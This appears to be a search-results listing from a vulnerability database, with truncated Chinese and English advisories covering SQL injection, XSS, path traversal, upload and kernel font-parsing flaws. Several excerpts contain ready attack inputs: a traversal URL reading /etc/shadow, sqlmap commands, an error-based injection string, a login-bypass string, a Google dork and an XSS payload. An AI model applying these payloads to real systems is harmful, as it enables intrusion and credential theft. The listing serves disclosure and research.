56796 matches found
上海寰创 WLAN 产品 DownloadServlet 任意文件下载漏洞
访问如下URL,可任意下载系统文件: http://ip:port/DownloadServlet?fileName=../../etc/shadow...
ZeusCart 4 index.php search 跨站脚本漏洞
ZeusCart是一个电子商务购物车应用。ZeusCart处理search变量存在跨站脚本漏洞,远程攻击者可以利用漏洞构建恶意URI,诱使用户解析,可获得敏感Cookie,劫持会话或在客户端上进行恶意操作。影响系统:ZeusCart 4发布时间:2015-03-10CVE ID:CVE-2015-2182CNCVE ID:CNCVE-20152182 ----------------------------------本地搭建环境测试POC截图:ZeusCart 4.1测试环境...
WordPress IBS Mappro插件 读取任意文件
WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。IBS Mappro是其中的一个旅游地图编辑器和查看器插件。 WordPress IBS Mappro插件1.0之前版本中的lib/download.php文件中存在绝对路径遍历漏洞。远程攻击者可借助‘file’参数中的完整路径名利用该漏洞读取任意文件。影响产品:WordPress IBS Mappro plugin 1.0这段代码允许用户下载任意文件if isset$GET $filename = $GET'file'; $info =...
w3tw0rk / Pitbul IRC Bot 远程命令执行
No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'w3tw0rk / Pitbul IRC Bot Remote Code Execution', 'Description' = %q This module allows remote...
e-cology 时间盲注(hpid参数)
1、缺陷文件homepage/LoginHomepage.jsp 2、注入参数:hpid3、涉及厂商:泛微软件4、证明:sqlmap.py -u "http://localhost/homepage/LoginHomepage.jsp?hpid=52" --technique T --dbms "Microsoft SQL Server"...
最土团购 /ajax/coupon.php SQL注入漏洞
最土团购 基础函数过滤不全导致注射。 ajax/coupon.php代码: ...... $cid = strval$GET'id'; //第5行 ...... $coupon = Table::FetchForce'coupon', $cid; //第44行 没有对参数id进行过滤,直接带入了FetchForce,再看看 FetchForce是什么 include/library/table.class.php 第172行 static public function FetchForce$n=null, $ids=array if empty$ids || !$ids return...
Shareaholic 7.6.0.3 XSS
File: shareaholic\shareaholic.php addaction'wpajaxshareaholicaddlocation', array'ShareaholicAdmin', 'addlocation'; $POST'location' is not escaped. File: shareaholic\admin.php public static function addlocation $location = $POST'location'; $appname = $location'appname';...
WordPress Pinboard 1.1.10 Theme Reflected XSS
$GET'tab' is not escaped. File: pinboard\includes\theme-options.php function pinboardthemepage addthemepage 'Pinboard Theme Options', 'pinboard' , 'Theme Options', 'pinboard' , 'editthemeoptions', 'pinboardoptions', 'pinboardadminoptionspage' ; addaction 'adminmenu', 'pinboardthemepage' ; functio...
ZCMS(JSP) V1.1 登陆绕过&SQL注入&跨站漏洞
No description provided by source...
用友NC-IUFO系统 /epp/detail/publishinfodetail.jsp SQL注入漏洞
No description provided by source...
Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure
No description provided by source...
qibocms 7.0 pm.php 存储型xss
No description provided by source...
Joomla vnmshop组件(插件)注入漏洞
Exploit Title: Joomla vnmshop组件(插件)注入漏洞 Google Dork: inurl:option=comvnmshop(61,800) Version: all version link vuln: site.com/index.php?option=comvnmshop&Itemid=211&catid=78%27 sqlmap -u "http://xxx/index.php?option=comvnmshop&Itemid=211&catid=78" --dbs ! legal disclaimer: Usage of sqlmap for...
WordPress RevSlider 3.0.3 上传漏洞
No description provided by source...
WordPress Calculated Fields Form 1.0.10 SQL Injection
No description provided by source...
Chamilo LMS 1.9.10 /main/calendar/agenda_list.php 跨站脚本漏洞
I. Overview ======================================================== Chamilo LMS 1.9.10 or prior versions are prone to a multiple Cross-Site Scripting Stored + Reflected & CSRF vulnerabilities. These vulnerabilities allows an attacker to gain control over valid user accounts in LMS, perform...
ThinkCMF 信息泄露漏洞
No description provided by source...
pluck CMS 4.7.2 Path Traversal
No description provided by source...
SunshineCRM v1 /general/ERP/LOGIN/logincheck.php SQL注入漏洞
(0day)郑州单点科技软件有限公司开发的开源软件SunShineCRMv1版存在SQL注入漏洞漏洞分析过程如下:1、 源码分析: SunShineCRM系统登录页面index.php的POST表单action跳转到logincheck.php页面 Logincheck.php页面负责对登录的用户名和密码进行验证,虽然有校验特殊字符的代码,但却并 未过滤和转义这些特殊字符2、 POC过程: 首先检测注入是否存在 然后使用SQLMAP探测目标数据库信息,默认数据库mysql和CRM系统数据库crmmarket sqlmap-u...
Centreon <=2.5.3 'exec()' 函数远程命令执行漏洞
No description provided by source. !/usr/bin/python coding: gb2312 文件名称:centreonexecrcepoc.py 编写时间:2014-12-09 更新时间:2015-07-17 漏洞说明:Centreon 'exec' 函数远程命令执行漏洞 影响版本:Centreon 参数 - 调试 - 认证debug - Yes 漏洞参考: Bugtraq ID:71333 http://www.securityfocus.com/bid/71333/ import sys import urllib flag =...
台州市极速网络CMS /data/log/passlog.php 任意代码执行漏洞
先看根目录当中的login.php? $ISLOGIN = true; require "./includes/headinc.php"; registershutdownfunction'unionend'; if$action == 'logout' $unionuser = $unionpass = $gid = ''; //clearcookies; //$sessarr = array; $SESSIONsessarr = $sessarr = ''; sessionunregister'sessarr'; echo "meta http-equiv="refresh"...
Rockwell Automation ControlLogix 固件上传漏洞
设备不正确验证用户,允许远程用户上传新的固件映像到Ethernet卡上,并且没有检查此固件映像是否合法或破坏,允许攻击者利用漏洞获得对设备的控制或使设备崩溃。...
MvMmall 网店商城系统 /search.php SQL注入漏洞
No description provided by source...
万户OA defaultroot/download_ftp.jsp 任意文件下载漏洞
No description provided by source...
ASUS TM-AC1900 栈缓冲区溢出漏洞
No description provided by source...
Kirby CMS <= V2.1.0 文件上传漏洞
1.漏洞分析 漏洞程序下载地址: http://download.getkirby.com/files/kirby-2.1.0.zip panel/app/controllers/api/files.php 220行 php ifstrtolower$file-extension == kirby-option'content.file.extension', 'txt' throw new Exception'Content files cannot be uploaded'; else ifstrtolower$file-extension == 'php' or...
OpenSNS_v1.7.1_index.php_sql注入
No description provided by source...
用友某二级域名未授权访问导致命令执行
简要描述: 未授权访问 详细说明: JBOOS的配置的web-console未设置权限访问 导致命令执行漏洞 漏洞证明: http://shenpi.yonyou.com/web-console/...
傲游4.3.0.300提示安装任意插件暴露external接口
http://extension.maxthon.cn/all/index.php?keyword=%22/%3E%3Cimg%20src=x%20onerror=%22external.mxCall%28%27InstallApp%27,%20%27http://extensiondl.maxthon.cn/skinpack/12041659/1356423316.mxaddon%27%29;%22/%3E 打开后提示安装http://extensiondl.maxthon.cn/skinpack/12041659/1356423316.mxaddon插件 external Objec...
大汉网络vipchat上传getshell漏洞(附案例)
简要描述: 大汉网络vipchat上传getshell漏洞 详细说明: 第一步伪造 session值:clusterid 地址:/vipchat/VerifyCodeServlet?var=clusterid None...
74CMS (V 3.5.2 - 20150423) utf8_to_gbk() 不安全性造成的SQL注入
No description provided by source...
Windows win32k.sys TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write
Source: https://code.google.com/p/google-security-research/issues/detail?id=402&can=1 We have encountered a Windows kernel crash in the win32k!fscBLTHoriz function while processing corrupted TTF font files, such as: --- DRIVERPAGEFAULTBEYONDENDOFALLOCATION d6 N bytes of memory was allocated and...
Windows win32k.sys TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow
Source: https://code.google.com/p/google-security-research/issues/detail?id=368&can=1 We have encountered a number of Windows kernel crashes in the win32k!itrpIUP function a handler of the IUP TTF program instruction while processing corrupted TTF font files, such as: --- PAGEFAULTINNONPAGEDAREA ...
Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table
Source: https://code.google.com/p/google-security-research/issues/detail?id=386&can=1 We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as: --- DRIVERPAGEFAULTINFREEDSPECIALPOOL d5 Memory was referenced after it...
Konica Minolta FTP Utility 1.0 - 目录穿越漏洞
No description provided by source...
逐浪CMS 2.X版本\Common\file.aspx SQL注入漏洞
问题文件:\Common\file.aspx注:此问题文件包含两个注入参数:code代码分析如下:protected void PageLoadobject sender, EventArgs e string str = "http://" + HttpContext.Current.Request.Url.Authority.ToString + "/UploadFiles/" + this.ull.GetLogintrue.UserName; if base.Request.QueryString"code" == null &&...
h5ai < 0.25.0 /server/php/inc/Api.php 任意文件上传漏洞
No description provided by source...
Windows win32k.sys TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow
Source: https://code.google.com/p/google-security-research/issues/detail?id=370&can=1 We have encountered a number of Windows kernel crashes in the win32k!sclApplyTranslation function while processing corrupted TTF font files, such as: --- PAGEFAULTINNONPAGEDAREA 50 Invalid system memory was...
Rockwell Automation ControlLogix 远程拒绝服务漏洞
漏洞起因 边界条件错误影响系统Rockwell Automation Micrologix 1400 Rockwell Automation Micrologix 1100远程攻击者可以利用漏洞使设备崩溃。攻击所需条件 攻击者必须访问Rockwell Automation MicroLogix产品。漏洞信息Rockwell Automation MicroLogix是一款可编程控制器平台。 设备没有校验要拷贝到缓冲区的数据,允许远程攻击者可以向2222/TCP, 2222/UDP,...
Joomla Spider Random Article Component - SQL Injection
Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability Author : Jagriti Sahu AKA Incredible Vendor Link : http://demo.web-dorado.com/spider-random-article.html Date : 22/03/2015 Discovered at : IndiShell Lab Love to : error1046 ^^ ,Team IndiShell,Codebreaker ICA...
WordPress 3.8.2 cookie 伪造漏洞
0x00 背景 看了WordPress 3.8.2补丁分析 HMAC timing attack,眼界大开,原来还可以利用时间差来判断HMAC。 但我总觉得这个漏洞并不是简单的修复这个问题。 查看了官方提供的资料:“该漏洞是由WordPress的安全团队成员Jon Cave发现。”。 也许漏洞还有这样利用的可能。 0x01 PHP的特性 当PHP在进行 ”==”,”!=”等非严格匹配的情况下,会按照值的实际情况,进行强制转换。 当有一个对比参数是整数的时候,会把另外一个参数强制转换为整数。 0x02 分析修复的代码 官方版的diff只在php里改动了一个位置:...
Wordpress Plugin Store Locator Plus 4.2.23 Email Injection
如果我们拥有有效的“钥匙”就可以发送邮件给任何人File: store-locator-le\include\send-email.phpif !wpverifynonce$REQUEST'valid','em' die; $messageheaders = "From: "$GET'emailname'"...
Windows win32k.sys TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access
Source: https://code.google.com/p/google-security-research/issues/detail?id=401&can=1 We have encountered a Windows kernel crash in the win32k!fscRemoveDups function while processing corrupted TTF font files, such as: --- PAGEFAULTINNONPAGEDAREA 50 Invalid system memory was referenced. This canno...
Espcms v5.0 /index.php SQL注入漏洞
构造www.xxx.cc/index.php?ac=search&at=taglist&tagkey=%2527,tags orselect 1 fromselect count,concatselect select concat0x7e,0x27,tablename,0x27,0x7e from informationschema.tables where tableschema=database limit 0,1,floorrand02x from informationschema.tables group by xa%23...
F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability
+------------------------------------------------------+ + F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability + +------------------------------------------------------+ Affected Product : F5 BIG-IP Vendor Homepage : http://www.f5.com/ Version : 10.1.0 Vulnerability Category : Local vulnerabilit...
DianYiPS V3.0建站系统后台sql注入漏洞
南宁典意数码科技有限公司,简称典意设计(http://www.dianyisheji.com/),注入点位于网站后台登陆用户名处,案例具体寻找办法可以通过谷歌搜索:powered by DianYiPS,找到案例后在域名后面加/dianyi/即是管理后台,可以用万能密码admin' or '1'='1登陆。...
某在线培训系统通用SQL注入漏洞
简要描述: 详细说明: 某在线培训系统通用SQL注入漏洞。 http://.../WebOrg/TCHlist.aspx?typeid=9 http://.../WebOrg/TCHlist.aspx?typeid=9 http://.../WebOrg/TCHlist.aspx?typeid=9 http://.../WebOrg/TCHlist.aspx?typeid=9 http://.../WebOrg/TCHlist.aspx?typeid=9 http://.../WebOrg/TCHlist.aspx?typeid=9 漏洞证明:...
FireEye Appliance - Unauthorized File Disclosure
Just one of many handfuls of FireEye / Mandiant 0day. Been sitting on this for more than 18 months with no fix from those security "experts" at FireEye. Pretty sure Mandiant staff coded this and other bugs into the products. Even more sad, FireEye has no external security researcher reporting...
WordPress Esplanade 1.1.4 Theme Reflected XSS
$GET'tab' is not escaped.File: esplanade\includes\theme-options.phpfunction esplanadethemepage addthemepage 'Esplanade Theme Options', 'esplanade' , 'Theme Options', 'esplanade' , 'editthemeoptions', 'esplanadeoptions', 'esplanadeadminoptionspage' ; addaction 'adminmenu', span clas...
Windows ATMFD.DLL Write to Uninitialized Address Due to Malformed CFF Table
Source: https://code.google.com/p/google-security-research/issues/detail?id=385&can=1 We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as: --- PAGEFAULTINNONPAGEDAREA 50 Invalid system memory was referenced. Th...